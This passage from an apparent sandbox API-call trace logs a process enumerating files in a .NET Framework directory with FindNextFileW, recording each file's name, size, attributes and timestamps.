ftLastAccessTime.dwLowDateTime=0x8e21545f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e2167ef, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xa0b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_regiis.exe", cAlternateFileName="")) returned 1 [0101.698] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93ba66dd, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93ba66dd, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93ba7a06, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1f0b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_regsql.exe", cAlternateFileName="")) returned 1 [0101.698] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91b271c2, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91b271c2, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91b271c2, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xb8b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_state.exe", cAlternateFileName="")) returned 1 [0101.699] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61e7255f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61e7255f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61e7255f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_state_perf.h", cAlternateFileName="")) returned 1 [0101.699] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62bdb8d1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x62bdb8d1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x62bdb8d1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa7f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_state_perf.ini", cAlternateFileName="")) returned 1 [0101.699] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x921a2b5e, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x921a2b5e, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x921a523b, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xb4a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_wp.exe", cAlternateFileName="")) returned 1 [0101.699] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920d32dc, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x920d32dc, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x920d4672, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1a4a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CasPol.exe", cAlternateFileName="")) returned 1 [0101.699] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ee2fcc, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97a89f7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97a89f7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="caspol.exe.config", cAlternateFileName="CASPOL~1.CON")) returned 1 [0101.700] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33fac342, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x33fac342, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x33fac342, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb340, dwReserved0=0x0, dwReserved1=0x0, cFileName="clientexclusionlist.xml", cAlternateFileName="")) returned 1 [0101.700] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x611c7daa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x611c7daa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x611c7daa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e663, dwReserved0=0x0, dwReserved1=0x0, cFileName="CLR-ETW.man", cAlternateFileName="")) returned 1 [0101.700] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e0fdb31, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e0fdb31, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e151ed2, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x6dde90, dwReserved0=0x0, dwReserved1=0x0, cFileName="clr.dll", cAlternateFileName="")) returned 1 [0101.700] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c4add6, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91c4add6, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91c50f7e, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="clrcompression.dll", cAlternateFileName="")) returned 1 [0101.701] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e252522, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e252522, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e254be8, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x39ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="clretwrc.dll", cAlternateFileName="")) returned 1 [0101.701] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dc2605d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dc2605d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dc2d672, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7f4a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="clrjit.dll", cAlternateFileName="")) returned 1 [0101.701] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd508c4, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd508c4, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd52fa1, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x2a6b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ComSvcConfig.exe", cAlternateFileName="")) returned 1 [0101.701] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42486, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x56eeeb4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x56eeeb4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config", cAlternateFileName="")) returned 1 [0101.702] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8df7bf91, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8df7bf91, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8df7d316, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1f6b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="CORPerfMonExt.dll", cAlternateFileName="")) returned 1 [0101.702] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e031d99, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e031d99, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e04f2dc, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x211e90, dwReserved0=0x0, dwReserved1=0x0, cFileName="csc.exe", cAlternateFileName="")) returned 1 [0101.702] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61ebea10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61ebea10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61ebea10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb6, dwReserved0=0x0, dwReserved1=0x0, cFileName="csc.exe.config", cAlternateFileName="")) returned 1 [0101.702] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61ebea10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61ebea10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61ebea10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x531, dwReserved0=0x0, dwReserved1=0x0, cFileName="csc.rsp", cAlternateFileName="")) returned 1 [0101.702] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd8026d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd8026d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd81603, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xd698, dwReserved0=0x0, dwReserved1=0x0, cFileName="Culture.dll", cAlternateFileName="")) returned 1 [0101.703] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91bbfb2d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91bbfb2d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91bc0eb0, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x176c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="CustomMarshalers.dll", cAlternateFileName="")) returned 1 [0101.703] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61ca8931, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61ca8931, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61ca8931, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa8b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cvtres.exe", cAlternateFileName="")) returned 1 [0101.703] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61ca8931, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61ca8931, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61ca8931, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x119, dwReserved0=0x0, dwReserved1=0x0, cFileName="cvtres.exe.config", cAlternateFileName="")) returned 1 [0101.703] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d9e86f, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93d9e86f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93d9fc15, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x116b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DataSvcUtil.exe", cAlternateFileName="")) returned 1 [0101.703] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x539b6eaa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x539b6eaa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x539b6eaa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DataSvcUtil.exe.config", cAlternateFileName="")) returned 1 [0101.704] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x611556a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x611556a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x611556a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="default.win32manifest", cAlternateFileName="")) returned 1 [0101.704] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93b2d8d7, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93b2d8d7, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93b30006, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x27090, dwReserved0=0x0, dwReserved1=0x0, cFileName="dfdll.dll", cAlternateFileName="")) returned 1 [0101.704] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939f7833, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x939f7833, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x939f8b82, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x5e98, dwReserved0=0x0, dwReserved1=0x0, cFileName="dfsvc.exe", cAlternateFileName="")) returned 1 [0101.704] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f09227, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ab01d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ab01d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa7, dwReserved0=0x0, dwReserved1=0x0, cFileName="dfsvc.exe.config", cAlternateFileName="DFSVCE~1.CON")) returned 1 [0101.705] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x922ed81c, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x922ed81c, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x922fd618, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xe74b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="diasymreader.dll", cAlternateFileName="")) returned 1 [0101.705] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x611a1b54, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x611a1b54, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x611a1b54, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c1bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="dv_aspnetmmc.chm", cAlternateFileName="")) returned 1 [0101.705] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e24d660, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e24d660, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e24eabf, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x17aa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EdmGen.exe", cAlternateFileName="")) returned 1 [0101.705] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd4909b1, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa55ec193, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xa55ec193, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0101.705] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91a467e9, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91a467e9, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91a4f06f, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xc4ac8, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventLogMessages.dll", cAlternateFileName="")) returned 1 [0101.706] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9213e96e, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x9213e96e, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x92142456, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x35ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileTracker.dll", cAlternateFileName="")) returned 1 [0101.706] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e25e822, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e25e822, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e25fb79, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x172a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fusion.dll", cAlternateFileName="")) returned 1 [0101.706] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeac616ff, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xeac616ff, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaaf41fbc, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FXUpdate.dat", cAlternateFileName="")) returned 1 [0101.706] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8de9c948, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8de9c948, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dea03b3, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x48698, dwReserved0=0x0, dwReserved1=0x0, cFileName="ilasm.exe", cAlternateFileName="")) returned 1 [0101.719] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f2f481, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ab01d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ab01d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xdf, dwReserved0=0x0, dwReserved1=0x0, cFileName="ilasm.exe.config", cAlternateFileName="ILASME~1.CON")) returned 1 [0101.719] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f2f481, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ab01d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ab01d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x601b, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallCommon.sql", cAlternateFileName="INSTAL~1.SQL")) returned 1 [0101.719] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f2f481, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ab01d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ab01d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xdbb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallMembership.sql", cAlternateFileName="INSTAL~2.SQL")) returned 1 [0101.719] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f2f481, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ab01d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ab01d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd577, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallPersistSqlState.sql", cAlternateFileName="INSTAL~3.SQL")) returned 1 [0101.720] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f2f481, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ab01d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ab01d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8886, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallPersonalization.sql", cAlternateFileName="INSTAL~4.SQL")) returned 1 [0101.720] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f2f481, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ab01d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ab01d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519b, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallProfile.SQL", cAlternateFileName="IN6346~1.SQL")) returned 1 [0101.720] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f2f481, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ab01d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ab01d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x85d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallRoles.sql", cAlternateFileName="IN7144~1.SQL")) returned 1 [0101.720] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f556dc, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97ab01d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97ad6433, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd49b, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallSqlState.sql", cAlternateFileName="IN71C0~1.SQL")) returned 1 